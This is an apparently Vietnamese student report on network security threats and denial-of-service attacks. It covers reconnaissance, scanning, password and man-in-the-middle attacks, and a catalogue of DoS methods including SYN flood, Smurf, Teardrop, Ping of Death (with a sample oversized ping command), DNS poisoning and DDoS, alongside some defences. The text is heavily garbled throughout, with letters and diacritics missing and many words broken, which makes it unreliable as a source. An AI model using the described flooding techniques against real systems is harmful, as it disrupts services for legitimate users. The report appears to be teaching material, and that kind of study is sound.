TI

T
GAME OVER GROUP
LP : 09 UY UY P TM3

UY L VI T T VY T V T I T

 TI

T
GAME OVER GROUP
LP : 09 UY UY P T 3

UY L VI T T VY T V T I T

L I

L I

L
T i:
Ph n I: I II III IV IV

V DDOS
ng ng Trang

i u i tv T n

Hiu bit v cc cuc tn cng mng Nhng nguy c nh hng n an ton mng. c c tn c ng mt mng m y t nh.. c c ch thc tn c ng . Mt s k thu t tn c ng mng Ph n II : i uT n ng ng os

II III

DoS attack l g ? 1. c mc ch ca tn c ng DoS. 2. Mc tiu Cc loi DoS attack hin ang c bit n v s dng Mt s phng ph p phng ch ng DOS. Ph n III : Kh i nim DDos (Distributed Denial Of Service) . c giai on ca cuc tn c ng DDos .. Kin trc tng quan ca DDos attack-network Phn Loi kiu tn c ng DDos Mt s c t nh ca c ng c DdoS attack Mt s c ng c DDoS.. Nhng k thu t ANTI- DDOS.

I II III IV V VI VII

Ph n 4

ng

nm ts

ht n

ng os v

os

Ph n I:
I: i u i t v cc u

i u i tv T n

ng

ng

t n cng m ng

Mt cuc tn cng mng c th c nh ngha l bt k phng php, quy trnh, phng tin c s dng c hi c gng tha hip an ninh mng. C mt s l do m mt c nhn (s) mu n tn cng mng doanh nghip. c c nhn thc hin cc cuc tn cng mng thng c gi l k tn cng mng, tin tc, hoc bnh quy gin. Mt vi loi khc nhau ca hot ng c hi m k tn cng mng v tin tc thc hin c tm tt y: S dng tri php ti khon ngi dng v c quyn n cp phn cng Phn mm nh cp hy m cho cc h th ng thit hi hy m thit hi v d liu tham nhng Sa i d liu c lu tr n cp d liu S dng d liu cho li ch ti chnh hoc hot ng gin ip cng nghip Thc hin cc hnh ng ngn chn ngi dng hp php c thm quyn truy c p vo cc dch v mng v cc ngun lc. Thc hin hnh ng lm cn kit ti nguyn mng v bng thng. II: hng nguy nh hng n an to n m ng 1. "Tay trong" Trong mt s doanh nghip va v nh, nhng d liu kinh doanh quan trng hay th ng tin kh ch hng thng c giao ph cho mt c nhn. iu ny to nn tnh trng "l thuc quyn hn" nguy him. Ton b bn ghi (log) h th ng mng, nhng b o c o t ng s kh ng c kim tra thng xuyn t ban qun tr. Vic tht tho t d liu c th din ra trong khong thi gian di m kh ng b ph t hin. 2. Kh ng c k hoch x l ri ro H th ng m y t nh, mng ca doanh nghip lu n phi i mt v i nhiu nguy c bo m t, t vic h hng v t l cho n c c trng hp b tn c ng t tin tc hay virus u c kh nng gy tn hi cho d liu. Kh nhiu doanh nghip va v nh thiu hn ch nh s ch phn ng v i vic tht tho t d liu hay k hoch khc phc s c . i a s u lng tng v bt u c c hot ng mang t nh ng ph. 3. Nhng thit l p mc nh kh ng c thay i Tin tc hin nay thng dng c c t p tin cha ng hng trm ngn ti khon mc nh (username v password) ca c c thit b kt n i mng d tm quyn hn 6

truy xut kh nng ng nh p vo h th ng mng. Nu c c ti khon, thit l p mc nh kh ng c thay i, tin tc s d dng chim quyn iu khin ti nguyn mng. 4. M i trng mng ti gia kh ng an ton i v i mt vi doanh nghip nh, c c nhn vin thng em m y t nh x ch tay (laptop) ca mnh n vn phng lm vic. Trong m i trng mng ti gia nh, ch bo m t thng rt km hay th m ch kh ng c nhng thit l p bo v. Do , nhng chic laptop ca nhn vin c th l ngun g c ph t t n virus, malware hay tr thnh zombie trung gian tin tc tn c ng vo h th ng mng ca doanh nghip. 5. Thiu cnh gi c v i mng c ng cng Mt th on chung tin tc hay s dng dn d nhng nn nhn l t mt thit b trung chuyn wireless access-point kh ng ci t m t khu (unsecured) ri g n mt c i nhn nh "Mng Wi-Fi min ph " v rung i ngi ch nhng kt n i "ngy th" ri vo by. Tin tc s dng c c c ng c thu tm gi d liu mng gip nh n bit c nhng vn bn hay bt k nhng g m nhn vin doanh nghip g ri gi ra ngoi. 6. Mt m t thit b di ng Rt nhiu doanh nghip, th m ch gn y cn c c mt vi hng l n b tht tho t d liu quan trng do mt cp m y t nh x ch tay, tht lc in thoi di ng hay c c a flash US lu tr. D liu trong c c thit b ny thng t c m ha hay bo v bng m t khu, rt d dng x l mt khi s hu chng. 7. Li t m y ch web Hin cn kh nhiu doanh nghip kh ng coi trng vic t website ca mnh ti m y ch no, mc bo m t ra sao. Do , website kinh doanh ca doanh nghip s l mi ngon ca c c t tn c ng SQL Injection hay botnet. 8. Duyt web trn lan Kh ng phi nhn vin vn phng no cng am hiu tng t n v nhng him ha rnh r p trn mng Internet nh malware, spyware, virus, trojan... H c v t truy c p vo c c website kh ng x c nh hoc b dn d click vo nhng website c tin tc by c cho n v th l m y t nh ca nhn vin s l c nh ca gip tin tc xm nh p vo trong mng ca doanh nghip. 9. Email cha ng m c Nhng cuc gii bom th r c s lm trn ng p hp th ca bn v i nhng tiu hp dn nh nhng v scandal tnh i, hnh nh nng bng hay c c li mi cho 7

kinh doanh... ch mt c nhp chut sai lm th ngay l p tc m y t nh s ti v c c on m c lm tin cho hng lot phn mm c hi i sau xm nh p vo m y tnh. 10. Kh ng v li bo m t Hn 90% c c cuc tn c ng vo h th ng mng u c gng khai th c c c li bo m t c bit n. Mc d c c bn v li vn thng xuyn c nhng hng sn xut cung cp ngay sau khi li c ph t hin nhng mt vi doanh nghip li kh ng coi trng vic c p nh t li thng nh t dn n vic c c li bo m t m toang cng cho n nhng cuc tn c ng. 11.Mt s nguy c kh c + L hng Zero-day i v i c c phn mm ca Adobe (Flash Player, Adobe Reader v Acrobat). y l l hng m i ph t hin trong th ng 3/2011 v c nh gi l li nghim trng. N cho php k tn c ng thc thi c c m lnh v c th chim quyn iu khin h th ng. Ti phm mng nh km m c d i hnh thc t p tin Flash (.swf) vo c c ti liu c nh dng pdf hoc Excel. + Su onficker xut hin t kh s m ti Vit Nam v lin tc c nhiu bin th kh c nhau; ngy cng tr nn nguy him. c t nh, c n hng triu m y t nh trn th gi i ang nhim su onficker v v tnh tr thnh mng m y t nh botnet gip cho c c hacker t chc c c t tn c ng DDoS quy m l n. + Hin ti, ang xut hin loi malware (m c) khi ly nhim vo m y t nh s chim quyn iu khin h th ng v a ra c c th ng b o gi mo. Malware ny tn c ng vo c c m y t nh s dng Windows kh ng c bn quyn v a ra ngh k ch hot dch v. Nhiu ngi tiu dng mt tin oan khi gi in thoi lin lc v i tng i (do hacker ch nh) ly m s k ch hot Windows. 12. Nhng im yu trong vn bo m t: Hiu c nhng im yu trong bo m t l mt vn ht sc quan trng tin hnh nhng ch nh s ch bo m t c hiu qu. Hiu nhng im yu ny gip bo m t mng tr c khi bi hacker tn c ng. isco x c nh nhng im yu trong bo m t gm c: technology weaknesses, configuration weaknesses v policy weaknesses. 12.1) Technology weaknesses: im yu trong k thu t gm c im yu trong protocol, operating system v hardware. a) TCP/IP weaknesses: Giao thc T P/IP l im yu trong bo m t v n c thit k nh mt tiu chun m gip cho vic trao i th ng tin c d dng. iu lm cho n tr

nn s dng rng ri nhng cng lm cho n d dng b tn c ng v hu ht mi ngi u thn thuc v i c ch thc T P/IP lm vic. Hai giao thc m isco th ch la chn trong chm giao thc T P/IP nhng v n c hu li kh ng c bo m t la SMTP ( T P ) va SNMP ( UDP ). in hnh ca k thu t tn c ng vo hai giao thc ny l IP spoofing, man-in-the-middle v session replay. b) Operating System weaknesses: Trong khi tt c c c h iu hnh u c im yu th Linux v Unix c xem nh l t c im yu hn Windows. Thc t, hu ht mi ngi dng c c phin bn ca Windows. c) Network equipment weaknesses: Hu ht c c thit b mng nh l servers, switchs, routers u c iu yu trong bo m t. Nhng c mt ch nh s ch t t cho vic cu hnh v lp t cho c c thit b mng s lm gim i rt nhiu s nh hnng ca im yu ny. 12.2) Configuration weaknesses: y l li do nh qun tr to ra. Li ny do c c thiu st trong vic cu hnh nh l: kh ng bo m t ti khon kh ch hng, h th ng ti khon v i password d dng o n bit, kh ng bo m t c c cu hnh mc nh trn thit b hay li trong vic cu hnh thit b. a) Unsecured user account: Mi user account cn c usename v password cho mc ch bo m t. c username v password ny thng c truyn i dng clear text trn mng. Do , cn c ch nh s ch bo m t user account nh m ho , authentication b) System account with easily guessed password: Mt im yu trong li cu hnh kh c l bo m t account v i password d dng b nh cp. ngn chn tnh trng , ngi qun tr cn c ch nh s ch kh ng cho php mt password c hiu lc mi mi m password ny phi c mt thi hn kt thc. c) Misconfigured Internet services: Mt vi c ng ty s dng a ch th t trn mng internet nh a ch cho hosts v servers. iu ny to nn im yu m c c hacker s d dng khai th c th ng tin. S dng giao thc NAT hoc PAT c th gii quyt vn trn. S dng a ch ring ( private address ) cho php nh a ch hosts v servers ma kh ng cn dng a ch th t trn mng, trong khi a ch th t th c border router nh tuyn ra mng internet.

 kh ng phi l bin ph p t i u. Port trn interface kt n i ra internet phi trng th i open cho php users vo mng internet v ngc li. l l hng trn bc tng la ( firewall ) m hacker c th tn c ng vo. n c th to ra t nh bo m t cho network bng c ch s dng conduits , l kt n i bo m t c bn. isco Secure Private Internet Echange ( PIX ) firewall l bin ph p t i u to ra t nh bo m t t t cho mng. d) Unsecured default settings in product: Nhiu sn phm phn cng c cung cp m kh ng c password hoc l password sn c gip cho nh qun tr d dng cu hnh thit b. N lm cho c ng vic d dng hn, nh mt s thit b ch cn cm vo v hot ng. iu ny s gip cho s tn c ng mng tr nn d dng. Do , ta cn phi thit l p mt ch nh s ch cu hnh bo m t trn mi thit b tr c khi thit b c lp t vo h th ng mng. e) Misconfigured Netword Equipment: Li cu hnh thit b l mt l hng c th khai th c tn c ng mng: password yu, kh ng c ch nh s ch bo m t hoc kh ng bo m t user account u l li cu hnh thit b. Phn cng v nhng giao thc chy trn thit b cng to ra l hng bo m t trong mng. Nu bn kh ng c ch nh s ch bo m t cho phn cng v nhng giao thc ny th hacker s li dng tn c ng mng. Nu bn s dng SNMP c mc nh thit l p th th ng tin c th b nh cp mt c ch d dng v nhanh chng. Do , hy chc chn l bn lm mt hiu lc ca SNMP hoc l thay i mc nh thit l p SNMP c sn. 12.3) Policy weaknesses: h nh s ch bo m t din t lm th no v u ch nh s ch bo m t c thc hin. y l iu kin quan trng gip vic bo m t c hiu qu t t nht. im yu trong ch nh s ch bao gm: Absence of a written security policy, organization politics, lack of business continuity, lax security administrator, installation and changes that do not follow the stated policy v no disaster recovery plan.

10

III:

t n

ng m t m ng m y t nh

1. Thu t p th ng tin v h th ng Thu t p th ng tin h th ng c th phn ra lm hai loi + Th ng (Passive Reconnaissance): theo seamoun th c th gi bng mt c i tn mc mt l "ci nga xem hoa h th ng". Vic thu t p th ng tin loi ny l kho s t s b t chc nh l th ng tin chung, v tr a l, in thoi, email ca c c c nhn, ngi iu hnh, ... trong t chc. c bn hi ti sao phi thu t p nhng th ng tin nh in thoi, email ca nhng ngi trong t chc ny lm c i qu i g ? N s rt hu ch khi thc hin social engineering attack (seamoun s c p sau ny). + h ng (Active Reconnaissance) loi ny th thu t p trc tip nhng th ng tin s t v i h th ng hn nh l (dy) a ch IP, domain, DNS. Lu : Tt c vic thu t p th ng tin ny rt quan trng i v i hacker v gip hacker x c nh nhng con ng no m d tn c ng vo h th ng nht. Gi ng nh i t n g i v y, t n trc tip "em g i" th ch c b u . Phi kho s t nh em u, c bao nhiu anh em, cha m nh th no, tm hiu s th ch em n qua nhng ngi bn thn ca em g i ... (Ni sai ch , ch ny cho my T ng min Nam v c ni chc siu hn seamoun ). Qu trnh thu t p th ng tin c th m t thnh 7 b c. (PHn loi ch mang t nh cht tng i). 1: Thu t p th ng tin ban u 2: X c nh phm vi ca mng. 3: Kim tra m y c "s ng" kh ng ? 4: Kh m ph nhng cng m . 5: Nh n din h iu hnh. 6: Lit k nhng dch v da trn c c cng m kim tra. 7: Xy dng mt s mng 2. Scanning Scanning hay cn gi l qut mng l b c kh ng th thiu c trong qu trnh tn c ng vo h th ng mng ca hacker. Nu lm b c ny t t Hacker s mau chng ph t hin c li ca h th ng v d nh li RP ca Window hay li trn phm mm dch v web nh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t c c trang web) tn c ng vo h th ng, ti t nht ly shell. Phn mm scanning c rt nhiu loi, gm c c phm mm thng mi nh Retina, GFI, vc c phn mm min ph nh Nmap,Nessus. Th ng thng c c n bn thng mi c th update c c bug li m i t internet v c th d tm c nhng li m i hn. c phn mm scanning c th gip ngi qun tr tm c li ca h th ng, ng thi a ra c c gii ph p sa li nh update Service patch hay s dng c c policy hp l hn.

11

3. Xm nh p v c quyn iu khin trn h th ng 4. Duy tr quyn iu khin trn h th ng 5. Xo du vt.

IV.

h th t n

ng

. Ph ho i m ng.

a trn t nh gi i h n ho kh ng th ph hi a t i nguyn

1) Th ng qua k t n i: 1.1: Tn c ng kiu SYN flood: Li dng c c thc hot ng ca kt n i T P/IP, hacker bt u qu trnh thit l p mt kt n i TP /IP v i mc tiu mu n tn c ng nhng s ph v kt n i ngay sau khi qu trnh SYN v SYN A K hon tt, khin cho mc tiu ri vo trng th i ch (i gi tin A K t ph a yu cu thit l p kt n i) v lin tc gi gi tin SYN A K thit l p kt n i . Mt c ch kh c l gi mo a ch IP ngun ca gi tin yu cu thit l p kt n i SYN v cng nh trng hp trn, m y t nh ch cng ri vo trng th i ch v c c gi tin SYN A K kh ng th i ch do a ch IP ngun l kh ng c th t. ch thc ny c th c c c hacker p dng tn c ng mt h th ng mng c bng th ng l n hn h th ng ca hacker. 2) Li ng ngun t i nguyn a h nh n n nhn t n ng:

2.1: Tn c ng kiu Land Attack Cng tng t nh SYN flood nhng hacker s dng ch nh IP ca mc tiu cn tn c ng dng lm a ch IP ngun trong gi tin, y mc tiu vo mt vng lp v t n khi c gng thit l p kt n i v i ch nh n. 2.2: T n ng ki u UDP flood Hacker gi gi tin UDP echo v i a ch IP ngun l cng loopback ca ch nh mc tiu cn tn c ng hoc ca mt m y t nh trong cng mng v i mc tiu qua cng UDP echo (port 7) thit l p vic gi v nh n c c gi tin echo trn 2 m y t nh (hoc gia mc tiu v i ch nh n nu mc tiu c cu hnh cng loopback) khin cho 2 m y t nh ny dn dn s dng ht bng th ng ca chng v cn tr hot ng chia s ti nguyn mng ca c c m y t nh kh c trong mng. 3) ng ng th ng: 3.1: Tn c ng kiu DDoS (Distributed Denial of Service) y l c ch thc tn c ng rt nguy him. Hacker xm nh p vo c c h th ng m y t nh, ci t c c chng trnh iu kin t xa v s k ch hot ng thi c c chng trnh ny vo cng mt thi im ng lot tn c ng vo mt mc tiu. ch thc ny c th huy ng t i hng trm th m ch hng ngn m y t nh cng tham gia tn c ng mt lc (ty vo s chun b tr c ca hacher) v c th ng n ht bng th ng ca mc tiu trong nh y mt.

12

4) ng

ngun t i nguyn khc:

K tn c ng li dng c c ngun ti nguyn m nn nhn cn n tn c ng. Nhng k tn c ng c th thay i d liu v t sao chp d liu m nn nhn cn ln nhiu ln lm PU b qu ti v c c qu trnh x l d liu b nh tr. 4.1: T n ng ki u murf tta k Kiu tn c ng ny cn mt h th ng rt quan trng, l mng khuych i. Hacker dng a ch ca m y t nh cn tn c ng gi broadcast gi tin I MP echo cho ton b mng. c m y t nh trong mng s ng lot gi gi tin I MP reply cho my t nh m hacker mu n tn c ng. Kt qu l m y t nh ny s kh ng th x l kp thi mt lng l n th ng tin nh v y v rt d b treo. 4.2: T n ng ki u Tear rop Trong mng chuyn mch gi, d liu c chia nh lm nhiu gi tin, m i gi tin c mt gi tr offset ring v c th truyn i theo nhiu ng t i ch. Ti ch, nh vo gi tr offset ca tng gi tin m d liu li c kt hp li nh ban u. Li dng iu ny, hacker c th to ra nhiu gi tin c gi tr offset trng lp nhau gi n mc tiu mu n tn c ng. Kt qu l m y t nh ch kh ng th sp xp c nhng gi tin ny v c th b treo do dng ht nng lc x l ca h th ng. .Ph ho i ho hnh sa th ng tin u hnh.

Li dng vic cu hnh thiu an ton (v d nh vic kh ng x c thc th ng tin trong vic gi v nh n bn tin update ca c c router) m k tn c ng s thay i t xa hoc trc tip c c th ng tin quan trng khin cho nhng ngi dng hp ph p kh ng th s dng dch v. V d: hacker c th xm nh p vo DNS thay i th ng tin, dn n qu trnh bin dch domain name sang IP ca DNS b sai lch. Kt qu l c c yu cu ca client n mt domain no s bin thnh mt domain kh c. .Ph ho i ho hnh sa vt l ph n ng.

Li dng quyn hn ca ch nh bn thn k tn c ng i v i c c thit b trong h th ng mng tip c n ph hoi (c c router, switch) t s k thut t n ng m ng

IV:

1) Reconnaissance attacks: c u hacker ping n tm nhm x c nh a ch IP ch. Sau , hacker x c nh nhng port cng nh nhng dch v ang s ng trn a ch IP . T nhng th ng tin ny, hacker bt u x c nh c dng v phin bn ca h iu hnh. Hacker tin hnh nh cp d liu hoc ph hu h iu hnh ca mng. c hnh thc tn c ng dng ny bao gm: packet sniffers, port scans, ping sweeps, internet information queries. 13

a) Packet sniffers L phn mm ng dng dng mt card adapter v i promiseous mode bt gi tt c c c gi tin gi xuyn qua mt mng LAN. K thu t ny ch thc hin c trn cng mt collision domain. Packet sniffers s khai th c nhng th ng tin c truyn dng clear text. Nhng giao thc truyn dng clear text bao gm: Telnet, FTP, SNMP, POP, HTTP i v packet c truyn i kh ng c m ho nh trn, n c th b x l bi bt k ai s dng k thu t packet sniffers. hng ng sau ng ngn n pa ket sniffers gm: authentication, switched infrastrutured, antisniffer va cryptography.

Authentication K thu t x c thc ny c thc hin ph bin nh one-type password (OTPs). K thu t ny c thc hin bao gm hai yu t : personal identification number ( PIN ) v token card x c thc mt thit b hoc mt phn mm ng dng. Token card l thit b phn cng hoc phn mm sn sinh ra thng tin mt c ch ngu nhin ( password ) tai mt thi im, thng l 60 giy. Kh ch hng s kt n i password v i mt PIN to ra mt password duy nht. Gi s mt hacker hc c password bng k thu t packet sniffers, th ng tin cng kh ng c gi tr v n ht hn. Switched infrastructured K thu t ny c th dng ngn chn packet sniffers trong m i trng mng. Vd: nu ton b h th ng s dng switch ethernet, hacker ch c th xm nh p vo lung traffic ang lu th ng ti 1 host m hacker kt n i n. K thu t ny kh ng lm ngn chn hon ton packet sniffer nhng n c th gim c tm nh hng ca n. Antisniffer tools L nhng phn mm v phn cng c thit k ngn chn sniffer. Th t s nhng ng dng ny kh ng ngn chn c hon ton nguy c b sniffer nhng cng gi ng nh nhng c ng c kh c, n l mt phn ca ton b h th ng. Cryptography K thu t m ho ny gip cho d liu c truyn i qua mng ma kh ng dng clear text. Gi s hacker c bt c d liu th cng kh ng th gii m c th ng tin. Phng ph p ny c hiu lc hn so v i vic d tm v ngn cn 14

sniffer. Nu nh mt knh truyn c m ho , d liu m packet sniffer d tm c cng kh ng c gi tr v kh ng phi l th ng tin ch nh x c ban u. H th ng m ha ca isco da trn k thu t IPSec, giao thc m ha ng hm da trn a ch IP. Nhng giao thc gm: Secure Sell Protocol ( SSH ) v Secure Socket Layer ( SSL ). b) Port scans va ping sweeps K thu t ny c tin hnh nhm nhng mc ch nh sau: X c nh nhng dch v trong mng X c nh c c host v thit b ang v n hnh trong mng X c nh h iu hnh trong h th ng X c nh tt c c c im yu trong mng, t tin hnh nhng mc ch kh c. V i k thu t ping sweeps, hacker c th x c nh mt danh s ch c c host ang s ng trong mt m i trng. T , hacker s dng c ng c port scans xoay vng qua tt c c c port v cung cp mt danh s ch y c c dch v ang chy trn host tm thy bi ping sweeps. ng vic tip theo l hacker x c nh nhng dch v c im yu v bt u tn c ng vo im yu ny. K thu t IDS c dng cnh b o cho nh qun tr khi c reconnaissance attacks nh l port scans va ping sweeps. IDS gip nh qun tr c s chun b t t nhm ngn cn hacker. c) Internet information queries DNS queries c th ch ra nhiu th ng tin nh l ngi s hu mt domain no v range a ch no c n nh cho domain . Hacker s dng c ng c ny trinh s t tm ra cc thng tin trn mng. ng v i port scans v ping sweeps, sau khi tm ra c nhng th ng tin y nh c c port active, c c giao thc chy trn port , hacker tin hnh kim tra nhng c trng ca c c ng dng ny tm ra im yu v bt u tn c ng. 2) Access attacks Trong phng ph p ny, k xm nh p in hnh tn c ng vo mng nhm: nh cp d liu, ginh ly quyn access, v ginh ly nhng c quyn access sau ny. Access attacks c th bao gm: Password attack Trust exploitation Port redirection Man in the middle attack 15

a) Password attack Hacker c th xm nh p h th ng dng c c k attacks, trojan horce, IP spoofing v packet sniffer.

thu t brute-force

Thng mt cuc tn c ng brute-force attack c thc hin dng 1 chu trnh chy xuyn qua mng v c gng xen vo chia s m i trng. Khi hacker ginh c quyn access n mt ngun ti nguyn, hacker cng v i user cng chia s quyn li. Nu nh c ti nguyn th hacker s to ra mt ca s k n cho ln access sau. Hacker c th lm thay i bng nh tuyn trong mng. iu s lm chc chn rng tt c c c gi tin s c gi n hacker tr c khi c gi n ch cu i cng. Trong mt vi trng hp, hacker c th gi m s t tt c c c traffic, th t s tr thnh mt man in the middle. Ta c th hn ch password attack bng nhng c ch sau Kh ng cho php user dng cng password trn c c h th ng. Lm mt hiu lc account sau mt vi ln login kh ng thnh c ng. c kim tra ny gip ngn chn vic r so t password nhiu ln. Kh ng dng passwords dng clear text: dng k thu t OTP hoc m ho password nh trnh by phn trn. Dng strong passwords: Dng password ny dng t nht 8 k t, cha c c uppercase letters, lowercase letters, nhng con s v nhng k t c bit. b) Trust exploitation y l phng ph p khai th c tin c y , n da vo c c m i quan h tin c y bn trong mng. nh thng, nu hai domain c m i quan h tin c y v i nhau th cho php thit b domain ny c th access vo domain kia. Hacker s li dng s h trong m i quan h tin c y nhm khai th c c c sai st trong m i quan h ny tho hip, tc l kim so t. H th ng bn ngoi firewall s c m i quan h hon ton kh ng tin c y v i h th ng bn trong firewall. c) Port redirection L mt dng kh c ca trust exploitation attack m n s dng mt host tho hip nhm ly giy php ra vo firewall. Ta c th tng nh l mt firewall v i 3 interface v mi interface kt n i v i 1 host. Host bn ngoi c th h ng n host public services ( thng c gi l demilitanized zone- DMZ ). V host public services c 16

th h ng t i c host bn trong hay bn ngoi firewall.Hacker lm cho host public service tr thnh 1 host tho hip. Hacker t mt phn mm ti host ny nhm to ra mt traffic trc tip t host outside n host inside. Kt n i ny s ko thc hin th ng qua firewall. Nh v y, host bn ngoi ginh c quyn kt n i v i host bn trong th ng qua qui trnh port redirection ti host trung tm ( public services host ). d) Man in the middle attack K thu t man in the middle c thc hn bao gm: Netword packet sniffers Giao thc routing v transport. Tn c ng man in the middle nhm mc ch: nh cp d liu Ginh ly mt phin giao dch Phn t ch traffic trong mng DoS Ph hng d liu c truyn Mt v d ca man in the middle attack l: mt ngi lm vic cho ISP v c gng access n tt c c c gi d liu v n chuyn gia ISP v bt k mt mng no kh c. Ta c th ngn chn hnh thc tn c ng ny bng k thu t m ho : m ho traffic trong mt ng hm IPSec, hacker s ch nhn thy nhng th ng tin khng c gi tr.

17

Ph n II :
I ) DoS attack l g ?

i uT n

ng

ng os

( Denial Of Services Attack ) _ DoS attack ( dch l tn cng t ch i dch v ) l kiu tn cng rt li hi , v i loi tn cng ny , bn ch cn mt my tnh kt n i Internet l c th thc hin vic tn cng c my tnh ca i phng . thc cht ca DoS attack l hacker s chim dng mt lng l n ti nguyn trn server ( ti nguyn c th l bng thng, b nh , cpu, a cng, ... ) lmcho server khng th no p ng cc yu cu t cc my ca ngui khc ( m yca nhng ngi dng bnh thng ) v server c th nhanh chng b ngng hot ng, crash hoc reboot 1 m h a t n ng o

gng chim bng th ng mng v lm h th ng mng b ng p (flood), khi h th ng mng s kh ng c kh nng p ng nhng dch v kh c cho ngi dng bnh thng. gng lm ngt kt n i gia hai m y, v ngn chn qu trnh truy c p vo dch v. gng ngn chn nhng ngi dng c th vo mt dch v no gng ngn chn c c dch v kh ng cho ngi kh c c kh nng truy c p vo. Khi tn c ng DoS xy ra ngi dng c cm gi c khi truy c p vo dch v nh b: + Disable Network - Tt mng + Disable Organization - T chc kh ng hot ng + Financial Loss Ti ch nh b mt 2. tiu m k t n ng thng s ng t n ng o

Nh chng ta bit bn trn tn c ng DoS xy ra khi k tn c ng s dng ht ti nguyn ca h th ng v h th ng kh ng th p ng cho ngi dng bnh thng c v y c c ti nguyn chng thng s dng tn c ng l g: To ra s khan him, nhng gi i hn v kh ng i m i ti nguyn ng th ng ca h th ng mng (Network andwidth), b nh , a, v PU Time hay cu trc d liu u l mc tiu ca tn c ng DoS. Tn c ng vo h th ng kh c phc v cho mng m y t nh nh: h th ng iu ho, h th ng in, ht h ng lm m t v nhiu ti nguyn kh c ca doanh nghip. n th tng tng khi ngun in vo m y ch web b ngt th ngi dng c th truy c p vo m y ch kh ng. Ph hoi hoc thay i c c th ng tin cu hnh.

18

Ph hoi tng v t l hoc c c thit b mng nh ngun in, iu ho II ) Cc lo i DoS attack hin ang i t n v s ng :

1 . ) Winnuke DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x .Hacker s gi cc gi tin v i d liu "Out of Band" n cng 139 ca my t nh ch.( ng 139 chnh l cng NetBIOS, cng ny ch chp nh n cc gi tin cc Out of Band c b t ) . Khi my tnh ca victim nh n c gi tin ny,mt mn hnh xanh bo li s c hin th ln v i nn nhn do chngtrnh ca Windows nh n c cc gi tin ny nhng n li khng bit phn ngv i cc d liu Out Of Band nh th no dn n h th ng s b crash . 2 . ) Ping of Death kiu DoS attack ny , ta ch cn gi mt gi d liu c kch th c l n thng qua lnh ping n my ch th h th ng ca h s b treo . _ VD : ping l 65000 3 . ) Teardrop Nh ta bit , tt c cc d liu chuyn i trn mng t h th ngngun n h th ng ch u phi tri qua 2 qu trnh : d liu sc chia ra thnh cc mnh nh h th ng ngun, mi mnh u phi cmt gi tr offset nht nh xc nh v tr ca mnh trong gid liu c chuyn i. Khi cc mnh ny n h th ng ch, h th ng ch s da vo gi tr offset sp xp cc mnh li v i nhau theo tht ng nh ban u . Li dng s h , ta ch cn gi n h th ng ch mt lot gi packets v i gi tr offset chng cho ln nhau. H th ng ch s khng th no sp xp li cc packets ny, n khng iu khinc v c th b crash, reboot hoc ngng hot ng nu s lng gi packets v i gi tr offset chng cho ln nhau qu l n! 4 . ) SYN Attack Trong SYN Attack, hacker s gi n h th ng ch mt lot SYN packets v i a ch ip ngun khng c thc. H th ng ch khi nh n c cc SYN packets ny s gi tr li cc a ch khng c thc v ch i nh n thng tin phn hi t cc a ch ip gi . V y l cc a ch ip khng c thc, nn h th ng ch s s ch i v ch v cn a cc "request"ch i ny vo b nh , gy lng ph mt lng ng k b nh trn my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin phn hi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c ach IP gi nh v y th h th ng s b qu ti dn n b crash hoc boot my tnh . == > nm du tay . 5 . ) Land Attack Land Attack cng gn gi ng nh SYN Attack, nhng thay v dng cc a ch ipkhng c thc, hacker s dng chnh a ch ip ca h th ng nn nhn. iuny s to nn mt vng lp v t n gia trong chnh h th ng nn nhn ,gia mt bn cn nh n thng tin phn hi cn mt bn th chng bao gi gith ng tin phn hi i c . == > G y ng p lng ng . 6 . ) Smurf Attack Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mngkhuch i (s nghe lnh ca hacker) v h th ng ca nn nhn. Hacker sgi cc gi tin ICMP n a ch broadcast ca mng khuch i. iu c bit l cc gi 19

tin ICMP packets ny c a ch ip ngun chnh l a ch ipca nn nhn . Khi cc packets n c a ch broadcast ca mngkhuch i, cc my tnh trong mng khuch i s tng rng my tnh nnnhn gi gi tin ICMP packets n v chng s ng lot gi tr li hth ng nn nhn cc gi tin phn hi ICMP packets. H th ng my nn nhn skh ng chu ni mt kh i lng khng l cc gi tin ny v nhanh chng bngng hot ng, crash hoc reboot. Nh v y, ch cn gi mt lng nh cc gi tin ICMP packets i th h th ng mng khuch i s khuch ilng gi tin ICMP packets ny ln gp bi . T l khuch i ph thuc vos mng tnh c trong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h th ng mng hoc routers cho php chuyn trc tipc c gi tin n a ch broadcast khng qua ch lc a ch ngun c cu ra ca gi tin . C c cc h th ng ny, hacker s d dng tin hnh Smurf Attack trn cc h th ng cn tn cng . == > mt my lm chng si nh ,chc my chm li ta nh cho thua . 7 . ) UDP Flooding Cch tn cng UDP i hi phi c 2 h th ng my cng tham gia. Hackers slm cho h th ng ca mnh i vo mt vng lp trao i cc d liu qua giaothc UDP. V gi mo a ch ip ca cc gi tin l a ch loopback (127.0.0.1 ) , ri gi gi tin ny n h th ng ca nn nhn trn cng UDP echo( 7 ). H th ng ca nn nhn s tr li li cc messages do 127.0.0.1( chnh n) gi n , kt qu l n s i vng mt vng lp v t n. Tuy nhin, cnhiu h th ng khng cho dng a ch loopback nn hacker s gi mo mta ch ip ca mt my tnh no trn mng nn nhn v tin hnh ng plt UDP trn h th ng ca nn nhn . Nu bn lm cch ny khng thnh cngth chnh my ca bn s b y . 8 . ) Tn cng DNS Hacker c th i mt l i vo trn Domain Name Server ca h th ng nn nhnri cho ch n mt website no ca hacker. Khi my khch yu cu DNS phntch a ch b xm nh p thnh a ch ip, l p tc DNS ( b hacker thayi cache tm thI ) s i thnh a ch ip m hacker cho ch n . Kt qu l thay v phi vo trang Web mu n vo th cc nn nhn s votrang Web do chnh hacker to ra . Mt cch tn cng t ch i dch v th t huhiu !. 9 . ) Distributed DoS Attacks ( DDos ) DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers sc thm nh p vo cc mng my tnh c bo m t km, sau ci ln c ch th ng ny chng trnh DDoS server. By gi cc hackers s hn nhau nthi gian nh s dng DDoS client kt n i n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n hth ng nn nhn . 10 . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht . Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngi tn cng ch cn dng mt my tn cng thng qua cc server l n trn th gi i . Vn v i phng php gi mo a ch IP ca victim , k 